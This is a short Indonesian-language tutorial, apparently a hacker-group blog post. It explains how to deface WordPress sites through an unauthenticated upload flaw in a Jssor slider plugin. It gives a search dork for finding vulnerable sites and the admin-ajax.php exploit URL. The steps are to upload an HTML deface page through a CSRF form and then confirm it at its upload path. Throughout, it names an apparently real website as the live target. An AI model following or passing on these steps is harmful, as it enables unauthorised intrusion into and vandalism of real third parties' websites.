Proof of Concept Json Slider with CSRF
Hi! Gw SwipeMoon,
Kali ini gw bakal memberitahu cara deface poc Json slider, ini sih poc lama yak, cmn mau ngasih tau ke yg gatau poc ini aja :b
BAHAN :
•DORK :
- inurl:/wp-content/jssor-slider/jssor-uploads/
•EXPLOIT :
- /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
•CSRF :
- KLIK GW
•SCRIPT DEFACE
Oke langsung ae, Pertama kalian ngedork dulu pake dork diatas, kalo w sih pale live target dibawah ini
Live Target : http://maxduhanov.ru/
Lalu masukan Exploit "/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library"
Contoh : http://maxduhanov.ru/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Kalau Tampilannya seperti gambar di atas, berarti web tersebut vuln, langsung aja salin URL nya lalu paste kan di CSRF
Kalau sudah, tinggal save lalu buka file CSRF tersebut di chrome / browser
Kalian pencet Choose File, Lalu pilih file deface kalian yang berekstensi .html lalu pencet submit, kalau sudah coba kalian akses script yang sudah kalian upload tadi.
Caranya?
Masukan Exploit berikut
/wp-content/jssor-slider/jssor-uploads/scriptdepes.html
Contoh :
http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/scriptdepes.html
Nah sudah berhasil ke upload :b
Sekian aja dari gw
Best Regards,
SwipeMoon
ForceCyberTeam